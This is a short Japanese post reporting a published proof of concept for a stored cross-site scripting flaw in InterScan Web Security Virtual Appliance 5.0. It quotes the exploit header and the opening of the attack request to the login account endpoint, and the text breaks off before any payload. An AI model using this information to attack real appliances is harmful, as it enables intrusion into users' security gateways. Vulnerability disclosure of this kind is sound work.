InterScan Web Security 5.0 Permanent XSS(情報元のブックマーク数)
InterScan Web Security Virtual Appliance 5.0なクロスサイトスクリプティングな脆弱性のPoCが出ています。
#################################################################################### -Exploit Title: Permanent XSS in InterScan Web Security Virtual Appliance 5.0 -Author: Ivan Huertas -Software Link: http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249®s=NABU&lang_loc=1 -Version: 5.0 -Tested on: Red Hat Nash 5.1 -Code : POST /login_account_add_modify.jsp HTTP/1.1 Host: xx.xx.xx.xx:1812 User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8